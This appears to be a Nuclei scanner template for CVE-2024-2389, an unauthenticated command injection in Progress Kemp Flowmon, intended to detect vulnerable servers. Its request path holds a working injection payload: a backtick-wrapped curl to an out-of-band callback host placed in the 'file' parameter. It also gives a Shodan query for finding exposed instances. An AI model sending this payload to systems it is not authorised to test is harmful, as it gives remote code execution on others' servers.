id: CVE-2024-2389

info:
  name: Progress Kemp Flowmon - Command Injection
  author: pdresearch,parthmalhotra
  severity: critical
  description: |
    In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.
  reference:
    - https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
    - https://www.flowmon.com
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1777977522140950640
    - https://github.com/adhikara13/CVE-2024-2389
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-2389
    cwe-id: CWE-78
    epss-score: 0.00043
    epss-percentile: 0.08267
  metadata:
    verified: true
    max-request: 1
    shodan-query: 'Server: Flowmon'
  tags: cve,cve2024,progress,rce,flowmon

http:
  - method: GET
    path:
      - "{{BaseURL}}/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`"

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'http')
          - contains(header, 'application/json') && contains(header, 'Flowmon')
        condition: and
# digest: 4a0a0047304502207fff2df97af5c386e321b4cf7cd8317add3157dc7d0ba1bcfcaf2a8a1afc1665022100f65e2e2ae77f22edcf20d9e072ab0b6a87b6a60d8d00c598d3e47ca906c1e60c:922c64590222798bb761d5b6d8e72950